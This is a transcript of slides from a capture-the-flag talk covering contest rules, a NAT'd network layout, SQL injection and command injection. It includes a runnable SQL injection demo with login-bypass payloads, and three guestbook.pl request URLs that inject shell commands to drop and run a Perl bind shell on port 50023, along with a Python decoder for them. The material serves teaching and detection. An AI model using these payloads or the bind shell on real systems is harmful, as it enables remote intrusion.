Transcript CTF - CIAST

CTF
Mike Gerschefske
Justin Gray
What is it?
Came from Defcon
 UCSB sponsors it (UCSB won last year's Defcon)
 Tests your skill at understanding security
 What it's not!
 Seeing who's 1337 or a l4m3r through script kiddie techniques
Rules

Don't be lame
 This includes (D)DoS and unfair bandwidth practices
 Circumventing the private network and using public IP addresses (not cool)
 Illegal stuff is not a good idea, e.g. don't hack the power grid
Everything else is legal!

At Defcon a team reverse engineered the scoring system and generated their own tokens.
People got upset, but it was legal.
You can root boxes, but that is not what's being tested.

w00t
Last year's event

Have to assume this year is similar
We p0wn3d the easy parts

SQL Injection



Example: http://128.198.61.43/~estore/cgi-bin/login.php
 Exploit unchecked user input
 Security through obscurity
 OMG – this really works!!!
 Perl example
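The slide only names the target (login.php) and the flaw (unchecked user input); the source of that script is not on the page. As an added example, not the presenters' code, the block below builds a constructed SQLite users table and a login routine that pastes the username and password into the SQL text the way a vulnerable cgi-bin login might, then runs two classic payloads through it and through the parameterised version. The table, account and payloads are all invented for the demonstration.

```python
"""Why "exploit unchecked user input" works against a login form.

Added example, not the estore login.php from the slide: a constructed
in-memory users table, a login that builds the query by string
concatenation, and the bound-parameter version that closes the hole.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Input is pasted into the SQL text, so a quote in the input changes
    the structure of the query. Returns the matched username or None."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Same query with bound parameters: the input is only ever data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# Two constructed payloads: one rewrites the boolean logic (AND binds
# tighter than OR, so the OR '1'='1' matches every row), the other uses
# a -- comment to drop the password check entirely.
PAYLOADS = {
    "tautology": ("admin", "x' OR '1'='1"),
    "comment":   ("admin'--", "anything"),
}


def compare(conn):
    """Run each payload through both logins; returns {name: (vuln, fixed)}."""
    return {name: (login_vulnerable(conn, u, p), login_fixed(conn, u, p))
            for name, (u, p) in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (vuln, fixed) in compare(make_db()).items():
        print(f"{name:10} vulnerable -> {vuln!r:8} fixed -> {fixed!r}")
```

Running it prints `admin` from the vulnerable login for both payloads and `None` from the fixed one; the fix is not escaping quotes by hand but letting the driver bind the values so they never become part of the statement.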
[Network diagram: Real Network and Test Network joined by a hub. Labels recoverable from the slide: Team Box (10.10.1.1), Mon Box (10.10.1.x), Attack Box, Vuln Patch Test (10.10.1.3), Vuln Image Test Box (10.10.1.4), Attack Boxes, Team Image (10.10.1.2), Console for Fixes, UCCS Boxes]
Network Topography
Effectively created a bidirectional NAT.
 Blocking IP addresses is futile: all traffic comes from the SAME IP
 Forces packet inspection
The example

Three requests to the guestbook CGI, each smuggling a shell command in backticks through the guestbook parameter (hyphens restored where extraction dropped them):

http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`echo%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)->accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`chmod%20755%20final.pl`
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`final.pl`

The octal escapes (\043 = #, \041 = !, \073 = ;, \044 = $, \175 = }) keep characters the URL parser or the shell would otherwise interpret out of the request; echo -e expands them, so final.pl is written as this Perl bind shell listening on port 50023:

#!/usr/bin/perl
use IO;
while(1){
while($c=new IO::Socket::INET(LocalPort,50023,Reuse,1,Listen)->accept){
$~->fdopen($c,w);
STDIN->fdopen($c,r);
system$_ while<>;
}
}
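Because the NAT makes every request arrive from the same address, the only way to see this attack is to look inside the request, which means pulling the parameter apart and expanding the escapes the way the target's shell would. The block below is an added example, not the presenters' code: it replays the three slide URLs (embedded as Python strings with the hyphens restored) through a small decoder that recovers the backtick command from the guestbook parameter and applies the escape rules of bash's builtin echo -e (octal \nnn and \0nnn, \n, \t, \\). That the target's echo behaved like bash's is an assumption; the recovered file shows why the payload works: `$~` is Perl's current-format variable, which defaults to the name of the selected output handle, so `$~->fdopen($c,w)` is `STDOUT->fdopen($c,w)` without having to spell out a second STDOUT.

```python
"""Decode the guestbook.pl command-injection requests shown above.

Added example, not the presenters' code: recovers the shell command from
the backticks in ?guestbook= and expands the echo -e escapes to show the
file the first request drops on the server.
"""
import re
from urllib.parse import parse_qs, urlsplit

CGI = "http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook="

# The three requests from the slide, in order: drop the bind shell, make it
# executable, run it. Backslashes are literal characters in the query string.
STEPS = [
    CGI + r'`echo%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c'
          r'=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)->accept){\n'
          r'\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n'
          r'\175\n\175\n"%20>%20final.pl`',
    CGI + "`chmod%20755%20final.pl`",
    CGI + "`final.pl`",
]

# Escapes as bash's builtin echo -e reads them: \n, \t, \\ and octal with an
# optional leading 0 followed by up to three digits (assumed to match the
# target's shell; it is what the slide's payload relies on).
ECHO_ESCAPES = re.compile(r"\\(0?[0-7]{1,3}|n|t|\\)")


def expand_echo_e(text: str) -> str:
    r"""Expand echo -e escapes, e.g. \044c -> '$c' and \175 -> '}'."""
    def repl(m):
        esc = m.group(1)
        if esc == "n":
            return "\n"
        if esc == "t":
            return "\t"
        if esc == "\\":
            return "\\"
        return chr(int(esc, 8))
    return ECHO_ESCAPES.sub(repl, text)


def injected_command(url: str) -> str:
    """Return the shell command substituted via backticks in ?guestbook=."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    value = params["guestbook"][0]            # %20 already decoded to spaces
    m = re.fullmatch(r"`(.*)`", value, re.S)
    if m is None:
        raise ValueError("guestbook parameter is not a backtick substitution")
    return m.group(1)


def dropped_file(command: str) -> tuple:
    """For an `echo -e "..." > path` command, return (path, file contents)."""
    m = re.fullmatch(r'echo -e "(.*)" > (\S+)', command, re.S)
    if m is None:
        raise ValueError("not an echo -e redirection")
    return m.group(2), expand_echo_e(m.group(1)) + "\n"   # echo adds a newline


def replay(urls):
    """Decode each request; returns (shell commands, dropped path, dropped source)."""
    commands = [injected_command(u) for u in urls]
    path, source = dropped_file(commands[0])
    return commands, path, source


if __name__ == "__main__":
    commands, path, source = replay(STEPS)
    for c in commands:
        print("shell:", c if len(c) < 60 else c[:60] + "...")
    print(f"--- {path} ---\n{source}")
```

The same two regular expressions are what an inspection rule would key on: a backtick or `$(` inside a CGI parameter, and an `echo -e` redirect whose octal escapes spell out characters that would not survive a URL.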
The bastard demo

W00t http://128.198.61.43
 SQL injection
 Unchecked code injection
 File upload!!!
 Buffer overrun
 Security through obscurity revisited: http://128.198.61.43/test/ccauthd/ccauthd.c
 Backups
 Network Topography
So you wanna be a h4x0r?

Here's what you need!
 vi – or any editor
 a browser – or anything that speaks HTTP
 a compiler (depends on the situation)
 a debugger (optional)
 a clue!
 Dumpster diving is cool
 Getting information from the inside